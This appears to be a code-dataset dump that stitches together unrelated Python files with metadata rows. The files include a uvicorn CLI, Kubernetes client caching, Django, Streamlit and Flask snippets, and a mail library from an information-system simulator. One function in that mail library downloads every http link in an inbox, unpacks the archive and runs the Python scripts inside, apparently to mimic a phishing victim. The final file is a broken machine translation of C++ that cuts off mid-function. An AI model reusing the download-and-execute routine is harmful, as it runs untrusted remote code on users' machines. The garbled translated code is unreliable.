return ip_address
@click.group()
@click.pass_context
def server(ctx):
pass
@server.command()
@click.option("--host", default=None, help="Specify application host")
@click.option("--port", default=5000, help="Specify application port")
@click.pass_context
def run(ctx, host, port):
try:
port = int(port)
if port < 1024 and port > 65535:
raise RuntimeError("Port should be from 1024 to 65535")
except ValueError:
raise RuntimeError("Port should be numeric")
if not host:
host = "127.0.0.1"
address = "127.0.0.1"
else:
address = get_address()
uvicorn.run(
"graph:init",
host=address,
port=port,
access_log=False,
log_level="info",
log_config=None,
loop="uvloop",
factory=True,
)
| 22.655172 | 70 | 0.590563 | 164 | 1,314 | 4.652439 | 0.445122 | 0.047182 | 0.019659 | 0.023591 | 0.076016 | 0 | 0 | 0 | 0 | 0 | 0 | 0.049041 | 0.286149 | 1,314 | 57 | 71 | 23.052632 | 0.764392 | 0.009132 | 0 | 0.152174 | 0 | 0 | 0.13 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065217 | false | 0.065217 | 0.065217 | 0 | 0.152174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
1efed2c2a7cb93434e5d67d1db9954f3a5ff1653 | 1,543 | py | Python | kubespawner/clients.py | moskiGithub/spawner_test | 405f088041054080f53b620b68fe040e5e0b091a | [
"BSD-3-Clause"
] | null | null | null | kubespawner/clients.py | moskiGithub/spawner_test | 405f088041054080f53b620b68fe040e5e0b091a | [
"BSD-3-Clause"
] | null | null | null | kubespawner/clients.py | moskiGithub/spawner_test | 405f088041054080f53b620b68fe040e5e0b091a | [
"BSD-3-Clause"
] | null | null | null | """Shared clients for kubernetes
avoids creating multiple kubernetes client objects,
each of which spawns an unused max-size thread pool
"""
from unittest.mock import Mock
import weakref
import kubernetes.client
from kubernetes.client import api_client
# FIXME: remove when instantiating a kubernetes client
# doesn't create N-CPUs threads unconditionally.
# monkeypatch threadpool in kubernetes api_client
# to avoid instantiating ThreadPools.
# This is known to work for kubernetes-4.0
# and may need updating with later kubernetes clients
_dummy_pool = Mock()
api_client.ThreadPool = lambda *args, **kwargs: _dummy_pool
_client_cache = {}
def shared_client(ClientType, *args, **kwargs):
"""Return a single shared kubernetes client instance
A weak reference to the instance is cached,
so that concurrent calls to shared_client
will all return the same instance until
all references to the client are cleared.
"""
kwarg_key = tuple((key, kwargs[key]) for key in sorted(kwargs))
cache_key = (ClientType, args, kwarg_key)
client = None
if cache_key in _client_cache:
# resolve cached weakref
# client can still be None after this!
client = _client_cache[cache_key]()
if client is None:
Client = getattr(kubernetes.client, ClientType)
client = Client(*args, **kwargs)
# cache weakref so that clients can be garbage collected
_client_cache[cache_key] = weakref.ref(client)
return client
| 32.829787 | 68 | 0.711601 | 203 | 1,543 | 5.295567 | 0.46798 | 0.089302 | 0.029767 | 0.035349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001672 | 0.224887 | 1,543 | 46 | 69 | 33.543478 | 0.897157 | 0.483474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021739 | 0 | 1 | 0.055556 | false | 0 | 0.222222 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
480a52a59f5e6ca79a9056130cb2d9abb336a9ed | 11,497 | py | Python | sim_user/mailLib.py | silicom-hub/IS_simulator | 4d134a8051c3604a94c2552503ff24015a3e86ee | [
"MIT"
] | 4 | 2021-11-24T10:58:51.000Z | 2022-03-11T15:13:22.000Z | sim_user/mailLib.py | silicom-hub/IS_simulator | 4d134a8051c3604a94c2552503ff24015a3e86ee | [
"MIT"
] | 1 | 2021-11-24T09:16:08.000Z | 2021-11-30T16:19:41.000Z | sim_user/mailLib.py | silicom-hub/IS_simulator | 4d134a8051c3604a94c2552503ff24015a3e86ee | [
"MIT"
] | 1 | 2021-11-24T11:10:38.000Z | 2021-11-24T11:10:38.000Z | import os
import wget
import time
import glob
import getpass
import tarfile
import subprocess
import email.mime.multipart
import email.mime.text
import email.mime.image
import email.mime.audio
from datetime import datetime
from pprint import pprint
from colorama import Style, Fore
from smtplib import SMTP, SMTP_SSL
from imaplib import IMAP4_SSL, IMAP4
def smtp_connect(smtp_server, verbose=True):
""" Conection to smtp server.
smtp_server_ip (str): This value is the smtp server's ip.
verbose (boolean): Print information about function progress.
Returns:
None
"""
try:
smtp = SMTP_SSL(host=smtp_server)
smtp.ehlo()
if verbose:
print(Fore.GREEN+ " ==> [smtp_connect] with SSL" +Style.RESET_ALL)
return smtp
except:
try:
smtp = SMTP(host=smtp_server)
smtp.ehlo()
if verbose:
print(Fore.GREEN+ " ==> [smtp_connect] without SSL" +Style.RESET_ALL)
return smtp
except:
print(Fore.RED+ " ==> [smtp_connect] failed!" +Style.RESET_ALL)
return 1
def imap_connect(imap_server, username, password, verbose=True):
""" Connection to imp server.
imap_server_ip (str): This value is the imap server's ip.
verbose (boolean): Print information about function progress.
Returns:
None
"""
try:
imap = IMAP4_SSL(imap_server)
imap.login(username, password)
if verbose:
print(Fore.GREEN+ " ==> [imap_connect] with SSL" +Style.RESET_ALL)
return imap
except:
try:
imap = IMAP4(imap_server)
imap.login(username, password)
if verbose:
print(Fore.GREEN+ " ==> [imap_connect] without SSL" +Style.RESET_ALL)
return imap
except:
print(Fore.RED+ " ==> [imap_connect] failed!" +Style.RESET_ALL)
def send_mail(smtp_server, FROM="", TO="", subject="", msg="", attachements=[], verbose=True):
""" Send mail.
smtp_server_ip (str): This value is the smtp server's ip.
FROM (str): This value is the sender email address.
TO (list): This value is a list of multiple recipient
SUBJECT (str, Optional): This value is the email's subject content.
msg (str, Optional): This value is the email's message content.
attachements (list Optional):
verbose (boolean): Print information about function progress.
Returns:
None
"""
smtp = smtp_connect(smtp_server, verbose=False)
mail = email.mime.multipart.MIMEMultipart()
mail["Subject"] = "[ "+subject+" ]"
mail["From"] = FROM
mail["To"] = TO
msg = email.mime.text.MIMEText(msg, _subtype="plain")
msg.add_header("Content-Disposition", "email message")
mail.attach(msg)
for attachement in attachements:
if attachement[0] == "image":
img = email.mime.image.MIMEImage(open(attachement[1], "rb").read())
img.add_header("Content-Disposition", "attachement")
img.add_header("Attachement-type", "image")
img.add_header("Attachement-filename", attachement[1])
mail.attach(img)
if attachement[0] == "file":
text = email.mime.text.MIMEText(open(attachement[1], "r").read())
text.add_header("Content-Disposition", "attachement")
text.add_header("Attachement-type", "filetext")
text.add_header("Attachement-filename", attachement[1])
mail.attach(text)
try:
smtp.sendmail(mail["From"], mail["To"], mail.as_string())
if verbose:
print(Fore.GREEN+ " ==> [send_mail] "+mail["From"]+" --> "+mail["To"]+" {"+subject+"} -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
smtp_logout(smtp, verbose=False)
except Exception as e:
print(Fore.RED+ " ==> [send_mail] failed! "+mail["From"]+" --> "+mail["To"]+" -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
print(Fore.RED+str(e)+Style.RESET_ALL)
smtp_logout(smtp, verbose=False)
def read_mailbox(imap_server, username, password, verbose=True): # attribut [ _payload ]
""" Read email inbox
imap_server_ip (str): This value is the imap server's ip.
login (str): This value is the username login.
password (str): This value is the password login.
verbose (boolean): Print information about function progress.
Returns:
list of str: all emails content
"""
imap = imap_connect(imap_server, username, password, verbose=False)
all_mails = []
imap.select("INBOX")
status, mails = imap.search(None, "ALL")
for mail in mails[0].split():
status, data = imap.fetch(mail, "(RFC822)")
mail_content = email.message_from_string(data[0][1].decode("utf-8"))
all_mails.append(mail_content)
for part in mail_content.walk():
if not part.is_multipart():
pass
if verbose:
print(Fore.GREEN+ " ==> [read_mailbox] {"+str(len(mails)-1)+"} -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
imap_logout(imap, verbose=False)
return all_mails
def read_mailbox_download_execute(imap_server, imap_login, imap_password):
""" Read email inbox and download link inside.
imap_server_ip (str): This value is the imap server's ip.
imap_login (str): This value is the username login.
imap_password (str): This value is the password login.
verbose (boolean): Print information about function progress.
Returns:
list of str: all emails content
"""
try:
path = None
mails = read_mailbox(imap_server, imap_login, imap_password, verbose=False)
if len(mails) <= 0:
print(Fore.YELLOW+ " ==> [read_mailbox_download_execute] {"+str(len(mails)-1)+"} -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
return 0
for mail in mails:
for element in str(mail).replace("\n", " ").split(" "):
if "http" in element:
path = wget.download(element)
if path == None:
print(Fore.YELLOW+ " ==> [read_mailbox_download_execute] {"+str(len(mails)-1)+"} -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
return 0
tarf_file = tarfile.open(path)
tarf_file.extractall(".")
tarf_file.close()
python_files = glob.glob("*/*maj*.py")
for python_script in python_files:
subprocess.getoutput("python3 "+python_script)
print(Fore.GREEN+ " ==> [read_mailbox_download_execute] {"+str(len(mails)-1)+"} -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
return True
except Exception as e:
print(Fore.RED+ " ==> [read_mailbox_download_execute] failed during execution! -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
print(e)
return False
def download_attachements(imap_server, username, password, verbose=True):
""" Read email inbox and download attachements.
imap_server_ip (str): This value is the imap server's ip.
imap_login (str): This value is the username login.
imap_password (str): This value is the password login.
verbose (boolean): Print information about function progress.
Returns:
list of str: all emails content
"""
imap = imap_connect(imap_server, username, password, verbose=False)
#INIT
if not os.path.isdir("/home/"+getpass.getuser()+"/Downloads"):
os.makedirs("/home/"+getpass.getuser()+"/Downloads")
mails = []
imap.select("INBOX")
status, mails = imap.search(None, "ALL")
for mail in mails[0].split():
status, data = imap.fetch(mail, "(RFC822)")
mail_content = email.message_from_string(data[0][1].decode("utf-8"))
for part in mail_content.walk():
if not part.is_multipart():
if part["Content-Disposition"] == "attachement" and part["Attachement-type"] == "filetext":
username = getpass.getuser()
file = open(part["Attachement-filename"],"w")
file.write(part._payload)
file.close()
imap_logout(imap, verbose=False)
print(Fore.GREEN+ " ==> [download_attachements] --- " + time.strftime("%H:%M:%S", time.localtime())+Style.RESET_ALL)
# In progress
def delete_old_emails(imap, time_laps=60):
delete_messages = []
imap.select("INBOX")
status, mails = imap.search(None, "ALL")
for mail in mails[0].split():
status, data = imap.fetch(mail, "(RFC822)")
mail_content = email.message_from_string(data[0][1].decode("utf-8"))
if (time.time() - time.mktime(time.strptime(mail_content["Date"], "%a, %d %b %Y %H:%M:%S %z")) >= time_laps ):
delete_messages.append(mail)
delete_emails(imap, delete_messages)
def delete_emails(imap, mails):
""" Delete mails specified in attributs
imap (imap_object): This value is the imap server's object.
mails (list): This value is an email list to delete.
Returns:
list of str: all emails content
"""
for mail in mails:
imap.store(mail,"+FLAGS","\\Deleted")
imap.expunge()
def delete_all_emails(imap_server, username, password, verbose=True):
""" Delete all emails in INBOX.
imap_server_ip (str): This value is the imap server's ip.
imap_login (str): This value is the username login.
imap_password (str): This value is the password login.
verbose (boolean): Print information about function progress.
Returns:
list of str: all emails content
"""
imap = imap_connect(imap_server, username, password, verbose=False)
delete_messages = []
imap.select("INBOX")
status, mails = imap.search(None, "ALL")
for mail in mails[0].split():
delete_messages.append(mail)
delete_emails(imap, delete_messages)
status, mails = imap.search(None, "ALL")
if len(mails) == 1:
print(Fore.GREEN+ " ==> [delete_all_emails] was successfull --- " + time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
imap_logout(imap, verbose=False)
return 0
print(Fore.RED+ " ==> [delete_all_emails] failed! --- " + time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
imap_logout(imap, verbose=False)
return 1
def imap_logout(imap, verbose=True):
""" Logout out to the imap service
imap (imap_object): This value is the imap server's object.
Returns:
None
"""
try:
imap.close()
imap.logout()
if verbose:
print(Fore.GREEN+ " ==> [imap_logout] was successfull" +Style.RESET_ALL)
except:
print(Fore.RED+ " ==> [imap_logout] failed" +Style.RESET_ALL)
def smtp_logout(smtp, verbose=True):
""" Logout out to the smtp service
smtp (smtp_object): This value is the smtp server's object.
Returns:
None
"""
try:
smtp.quit()
if verbose:
print(Fore.GREEN+ " ==> [smtp_logout] was successfull" +Style.RESET_ALL)
except:
print(Fore.RED+ " ==> [smtp_logout] failed" +Style.RESET_ALL)
| 41.060714 | 168 | 0.609898 | 1,431 | 11,497 | 4.781272 | 0.134871 | 0.030254 | 0.036977 | 0.04297 | 0.655949 | 0.590178 | 0.540047 | 0.494592 | 0.456299 | 0.431453 | 0 | 0.005383 | 0.256676 | 11,497 | 279 | 169 | 41.207885 | 0.795226 | 0.231278 | 0 | 0.424731 | 0 | 0 | 0.151743 | 0.017252 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05914 | false | 0.086022 | 0.086022 | 0 | 0.209677 | 0.123656 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
480d49129b8a557b65a1a726cce2b2b64435ab5e | 1,418 | py | Python | streamlitfront/tests/dummy_app.py | i2mint/streamlitfront | 6fbc03a42cdb7436dcda3da00fb9b42965bbb582 | [
"Apache-2.0"
] | null | null | null | streamlitfront/tests/dummy_app.py | i2mint/streamlitfront | 6fbc03a42cdb7436dcda3da00fb9b42965bbb582 | [
"Apache-2.0"
] | 1 | 2022-02-03T15:21:57.000Z | 2022-02-05T00:51:33.000Z | streamlitfront/tests/dummy_app.py | i2mint/streamlitfront | 6fbc03a42cdb7436dcda3da00fb9b42965bbb582 | [
"Apache-2.0"
] | null | null | null | from streamlitfront.base import get_pages_specs, get_func_args_specs, BasePageFunc
import streamlit as st
from pydantic import BaseModel
import streamlit_pydantic as sp
def multiple(x: int, word: str) -> str:
return str(x) + word
class Input(BaseModel):
x: int
y: str
def multiple_input(input: Input):
return input.x * input.y
class SimplePageFunc2(BasePageFunc):
def __call__(self, state):
self.prepare_view(state)
# args_specs = get_func_args_specs(self.func)
element = sp.pydantic_input('input', Input)
st.write(element)
# func_inputs = dict(self.sig.defaults, **state['page_state'][self.func])
func_inputs = {'input': element}
st.write(func_inputs)
# for argname, spec in args_specs.items():
# st.write(f"argname:{argname}")
# st.write(f"spec:{spec}")
# element_factory, kwargs = spec["element_factory"]
# func_inputs[argname] = element_factory(**kwargs)
# st.write(f"element_factory:{element_factory}")
# st.write(f"kwargs:{kwargs}")
submit = st.button('Submit')
if submit:
st.write(self.func(func_inputs['input']))
# state['page_state'][self.func].clear()
DFLT_PAGE_FACTORY = SimplePageFunc2
if __name__ == '__main__':
app = get_pages_specs([multiple_input], page_factory=DFLT_PAGE_FACTORY)
app['Multiple Input'](None)
| 28.938776 | 82 | 0.658674 | 182 | 1,418 | 4.879121 | 0.307692 | 0.05518 | 0.036036 | 0.036036 | 0.13964 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001795 | 0.214386 | 1,418 | 48 | 83 | 29.541667 | 0.795332 | 0.300423 | 0 | 0 | 0 | 0 | 0.043833 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12 | false | 0 | 0.16 | 0.08 | 0.52 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
480d62d6a3b8b59327c71459cf291592859ce935 | 367 | py | Python | app/build.py | dhost-project/build-microservice | 4376169a2753f37fe8c7985525bd3fd3af6f11e7 | [
"MIT"
] | null | null | null | app/build.py | dhost-project/build-microservice | 4376169a2753f37fe8c7985525bd3fd3af6f11e7 | [
"MIT"
] | null | null | null | app/build.py | dhost-project/build-microservice | 4376169a2753f37fe8c7985525bd3fd3af6f11e7 | [
"MIT"
] | null | null | null | from flask_restful import Resource, reqparse
parser = reqparse.RequestParser()
parser.add_argument('command', required=True)
parser.add_argument('docker', required=True)
class Build(Resource):
def get(self):
return {'status': 'building'}
def post(self):
args = parser.parse_args()
print(args)
return {'status': 'started'}
| 21.588235 | 45 | 0.6703 | 42 | 367 | 5.761905 | 0.642857 | 0.07438 | 0.140496 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.19891 | 367 | 16 | 46 | 22.9375 | 0.823129 | 0 | 0 | 0 | 0 | 0 | 0.108992 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0.090909 | 0.545455 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
480d6eb2f995a9bfa4e6589d0220badcbea502c9 | 1,224 | py | Python | src/unicon/plugins/windows/__init__.py | nielsvanhooy/unicon.plugins | 3416fd8223f070cbb67a2cbe604e3c5d13584318 | [
"Apache-2.0"
] | 18 | 2019-11-23T23:14:53.000Z | 2022-01-10T01:17:08.000Z | src/unicon/plugins/windows/__init__.py | nielsvanhooy/unicon.plugins | 3416fd8223f070cbb67a2cbe604e3c5d13584318 | [
"Apache-2.0"
] | 12 | 2020-11-09T20:39:25.000Z | 2022-03-22T12:46:59.000Z | src/unicon/plugins/windows/__init__.py | nielsvanhooy/unicon.plugins | 3416fd8223f070cbb67a2cbe604e3c5d13584318 | [
"Apache-2.0"
] | 32 | 2020-02-12T15:42:22.000Z | 2022-03-15T16:42:10.000Z | __copyright__ = "# Copyright (c) 2018 by cisco Systems, Inc. All rights reserved."
__author__ = "dwapstra"
from unicon.plugins.generic import GenericSingleRpConnection, service_implementation as svc
from unicon.plugins.generic.connection_provider import GenericSingleRpConnectionProvider
from unicon.plugins.generic import ServiceList, service_implementation as svc
from . import service_implementation as windows_svc
from .statemachine import WindowsStateMachine
from .settings import WindowsSettings
class WindowsConnectionProvider(GenericSingleRpConnectionProvider):
"""
Connection provider class for windows connections.
"""
def init_handle(self):
pass
class WindowsServiceList(ServiceList):
""" windows services. """
def __init__(self):
super().__init__()
self.execute = windows_svc.Execute
class WindowsConnection(GenericSingleRpConnection):
"""
Connection class for windows connections.
"""
os = 'windows'
platform = None
chassis_type = 'single_rp'
state_machine_class = WindowsStateMachine
connection_provider_class = WindowsConnectionProvider
subcommand_list = WindowsServiceList
settings = WindowsSettings()
| 29.853659 | 91 | 0.763072 | 114 | 1,224 | 7.929825 | 0.491228 | 0.033186 | 0.056416 | 0.079646 | 0.132743 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003941 | 0.170752 | 1,224 | 40 | 92 | 30.6 | 0.8867 | 0.089869 | 0 | 0 | 0 | 0 | 0.082397 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0.043478 | 0.26087 | 0 | 0.782609 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
48137f6833204958dbcfd12efea83db5d3727b1f | 158 | py | Python | python/square root.py | SULING4EVER/learngit | d55f942fbd782b309b0490c34a1bb743f6c4ef03 | [
"Apache-2.0"
] | null | null | null | python/square root.py | SULING4EVER/learngit | d55f942fbd782b309b0490c34a1bb743f6c4ef03 | [
"Apache-2.0"
] | null | null | null | python/square root.py | SULING4EVER/learngit | d55f942fbd782b309b0490c34a1bb743f6c4ef03 | [
"Apache-2.0"
] | null | null | null | x=input("Enter a umber of which you want to know the square root.")
x=int(x)
g=x/2
while (g*g-x)*(g*g-x)>0.00000000001:
g=(g+x/g)/2
print(g)
print(g)
| 19.75 | 67 | 0.620253 | 38 | 158 | 2.578947 | 0.552632 | 0.081633 | 0.091837 | 0.081633 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10687 | 0.170886 | 158 | 7 | 68 | 22.571429 | 0.641221 | 0 | 0 | 0.285714 | 0 | 0 | 0.35443 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
481650f94557e95d1e169f088c7d5dec8a6391f7 | 1,212 | py | Python | iaso/migrations/0052_fix_period_before_after.py | ekhalilbsq/iaso | e6400c52aeb4f67ce1ca83b03efa3cb11ef235ee | [
"MIT"
] | 29 | 2020-12-26T07:22:19.000Z | 2022-03-07T13:40:09.000Z | iaso/migrations/0052_fix_period_before_after.py | ekhalilbsq/iaso | e6400c52aeb4f67ce1ca83b03efa3cb11ef235ee | [
"MIT"
] | 150 | 2020-11-09T15:03:27.000Z | 2022-03-07T15:36:07.000Z | iaso/migrations/0052_fix_period_before_after.py | ekhalilbsq/iaso | e6400c52aeb4f67ce1ca83b03efa3cb11ef235ee | [
"MIT"
] | 4 | 2020-11-09T10:38:13.000Z | 2021-10-04T09:42:47.000Z | # Generated by Django 2.1.11 on 2020-06-04 09:19
from django.db import migrations, models
def fix_period_before_after(apps, schema_editor):
# noinspection PyPep8Naming
Form = apps.get_model("iaso", "Form")
for form in Form.objects.filter(period_type=None).exclude(periods_before_allowed=0, periods_after_allowed=0):
form.periods_before_allowed = 0
form.periods_after_allowed = 0
form.save()
class Migration(migrations.Migration):
dependencies = [("iaso", "0051_device_position")]
operations = [
migrations.AlterField(
model_name="form",
name="period_type",
field=models.TextField(
blank=True,
choices=[("MONTH", "Month"), ("QUARTER", "Quarter"), ("SIX_MONTH", "Six-month"), ("YEAR", "Year")],
null=True,
),
),
migrations.AlterField(model_name="form", name="periods_after_allowed", field=models.IntegerField(default=0)),
migrations.AlterField(model_name="form", name="periods_before_allowed", field=models.IntegerField(default=0)),
migrations.RunPython(fix_period_before_after, reverse_code=migrations.RunPython.noop),
]
| 35.647059 | 118 | 0.655116 | 139 | 1,212 | 5.503597 | 0.482014 | 0.04183 | 0.078431 | 0.113725 | 0.338562 | 0.275817 | 0.227451 | 0 | 0 | 0 | 0 | 0.028391 | 0.215347 | 1,212 | 33 | 119 | 36.727273 | 0.776025 | 0.059406 | 0 | 0.086957 | 1 | 0 | 0.130167 | 0.037819 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.043478 | 0 | 0.217391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
481a590185ab360ad8f0c2ef3e09b5d683dfa4f6 | 26,620 | py | Python | examples/rough_translated1/osgthreadedterrain.py | JaneliaSciComp/osgpyplusplus | a5ae3f69c7e9101a32d8cc95fe680dab292f75ac | [
"BSD-3-Clause"
] | 17 | 2015-06-01T12:19:46.000Z | 2022-02-12T02:37:48.000Z | examples/rough_translated1/osgthreadedterrain.py | cmbruns/osgpyplusplus | f8bfca2cf841e15f6ddb41c958f3ad0d0b9e4b75 | [
"BSD-3-Clause"
] | 7 | 2015-07-04T14:36:49.000Z | 2015-07-23T18:09:49.000Z | examples/rough_translated1/osgthreadedterrain.py | cmbruns/osgpyplusplus | f8bfca2cf841e15f6ddb41c958f3ad0d0b9e4b75 | [
"BSD-3-Clause"
] | 7 | 2015-11-28T17:00:31.000Z | 2020-01-08T07:00:59.000Z | #!/bin/env python
# Automatically translated python version of
# OpenSceneGraph example program "osgthreadedterrain"
# !!! This program will need manual tuning before it will work. !!!
import sys
from osgpypp import OpenThreads
from osgpypp import osg
from osgpypp import osgDB
from osgpypp import osgGA
from osgpypp import osgTerrain
from osgpypp import osgText
from osgpypp import osgUtil
from osgpypp import osgViewer
# Translated from file 'osgthreadedterrain.cpp'
# OpenSceneGraph example, osgterrain.
#*
#* Permission is hereby granted, free of charge, to any person obtaining a copy
#* of this software and associated documentation files (the "Software"), to deal
#* in the Software without restriction, including without limitation the rights
#* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#* copies of the Software, and to permit persons to whom the Software is
#* furnished to do so, subject to the following conditions:
#*
#* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#* THE SOFTWARE.
#
#include <OpenThreads/Block>
#include <osg/Group>
#include <osg/Geode>
#include <osg/ShapeDrawable>
#include <osg/Texture2D>
#include <osg/PositionAttitudeTransform>
#include <osg/MatrixTransform>
#include <osg/CoordinateSystemNode>
#include <osg/ClusterCullingCallback>
#include <osg/ArgumentParser>
#include <osgDB/FileUtils>
#include <osgDB/fstream>
#include <osgDB/ReadFile>
#include <osgUtil/IncrementalCompileOperation>
#include <osgText/FadeText>
#include <osgViewer/Viewer>
#include <osgViewer/ViewerEventHandlers>
#include <osgGA/TrackballManipulator>
#include <osgGA/FlightManipulator>
#include <osgGA/DriveManipulator>
#include <osgGA/KeySwitchMatrixManipulator>
#include <osgGA/StateSetManipulator>
#include <osgGA/AnimationPathManipulator>
#include <osgGA/TerrainManipulator>
#include <osgTerrain/TerrainTile>
#include <osgTerrain/GeometryTechnique>
#include <osgTerrain/Layer>
#include <iostream>
typedef std.vector< osg.GraphicsThread > GraphicsThreads
class ReleaseBlockOnCompileCompleted (osgUtil.IncrementalCompileOperation.CompileCompletedCallback) :
ReleaseBlockOnCompileCompleted(osg.RefBlockCount* block):
_block(block)
def compileCompleted(compileSet):
if _block.valid() : _block.completed()
# tell IncrementalCompileOperation that it's now safe to remove the compileSet
osg.notify(osg.NOTICE), "compileCompleted(", compileSet, ")"
return True
_block = osg.RefBlockCount()
class LoadAndCompileOperation (osg.Operation) :
LoadAndCompileOperation( str filename, osgUtil.IncrementalCompileOperation* ico , osg.RefBlockCount* block):
Operation("Load and compile Operation", False),
_filename(filename),
_incrementalCompileOperation(ico),
_block(block)
virtual void operator () (osg.Object* object)
# osg.notify(osg.NOTICE), "LoadAndCompileOperation ", _filename
_loadedModel = osgDB.readNodeFile(_filename)
if _loadedModel.valid() and _incrementalCompileOperation.valid() :
compileSet = osgUtil.IncrementalCompileOperation.CompileSet(_loadedModel)
compileSet._compileCompletedCallback = ReleaseBlockOnCompileCompleted(_block)
_incrementalCompileOperation.add(compileSet)
else:
if _block.valid() : _block.completed()
# osg.notify(osg.NOTICE), "done LoadAndCompileOperation ", _filename
_filename = str()
_loadedModel = osg.Node()
_incrementalCompileOperation = osgUtil.IncrementalCompileOperation()
_block = osg.RefBlockCount()
class MasterOperation (osg.Operation) :
typedef std.set<str> Files
typedef std.map<str, osg.Node > FilenameNodeMap
typedef std.vector< osg.Node > Nodes
MasterOperation( str filename, osgUtil.IncrementalCompileOperation* ico):
Operation("Master reading operation",True),
_filename(filename),
_incrementalCompileOperation(ico)
#* Set the OperationQueue that the MasterOperation can use to place tasks like file loading on for other processes to handle.
def setOperationQueue(oq):
_operationQueue = oq
def getOperationQueue():
return _operationQueue
def readMasterFile(files):
fin = osgDB.ifstream(_filename.c_str())
if fin :
fr = osgDB.Input()
fr.attach(fin)
readFilename = False
while not fr.eof() :
itrAdvanced = False
if fr.matchSequence("file %s") or fr.matchSequence("file %w") :
files.insert(fr[1].getStr())
fr += 2
itrAdvanced = True
readFilename = True
if not itrAdvanced :
++fr
return readFilename
return False
def open(group):
files = Files()
readMasterFile(files)
for(Files.iterator itr = files.begin()
not = files.end()
++itr)
model = osgDB.readNodeFile(*itr)
if model :
osg.notify(osg.NOTICE), "open: Loaded file ", *itr
group.addChild(model)
_existingFilenameNodeMap[*itr] = model
return True
virtual void operator () (osg.Object* callingObject)
# decided which method to call according to whole has called me.
viewer = dynamic_cast<osgViewer.Viewer*>(callingObject)
if viewer : update(viewer.getSceneData())
load = else()
def load():
#osg.notify(osg.NOTICE), "void load(Object)"
filesA = Files()
filesB = Files()
readMasterFile(filesB)
